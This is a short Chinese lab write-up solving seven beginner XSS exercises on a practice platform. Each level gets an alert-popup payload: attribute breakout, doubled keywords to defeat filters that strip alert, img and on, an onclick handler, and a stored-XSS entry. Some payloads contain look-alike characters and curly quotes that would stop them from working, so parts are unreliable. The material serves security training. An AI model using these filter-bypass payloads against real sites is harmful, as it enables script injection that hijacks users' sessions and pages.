练习平台:云演–零基础入门-xss漏洞实验
练习1:直接输出
<script>alert("flag")</script>
练习2:value
输入flag后,查看源代码发现input标签中value=‘flag’
采用闭合标签的方式绕过
'><img src=1 onerror=alert("flag")>
src属性是规定显示图像的URL,onerror为发生错误时执行的命令,当url有误时,执行alert弹窗
练习3:XSS过滤简单
输入’><img src=1 οnerrοr=alert(“flag”)>后查看源代码,发现alert消失了
双写alert函数绕过
"><img src=1 οnerrοr=alalertert("flag")>
练习4:XSS过滤简单
直接输入"><img src=1 οnerrοr=alert(“flag”)>脚本执行出错终止运行显示error,换成其他弹窗函数
"><img src=1 οnerrοr=prompt("flag")>
练习5:XSS过滤稍难
过滤内容增多,img,on(error)和alert都被过滤了,都使用双写
"><imimgg src=1 oonnerror=alealertrt("flag")>
练习6:XSS过滤困难
img,on,alert,<都被过滤,结合程序执行顺序即危险字符删除顺序进行双写,注意双引号要改成单引号,否则alert无法触发
aaa" oimgnclick="alimgert('flag')
提交后不会直接弹窗,点击一下输入框
练习7:存储性XSS
填写后,输入的数据会被保存下来,点击查询输入ID可以查到刚刚输入的name
name:<script>alert("flag")</script>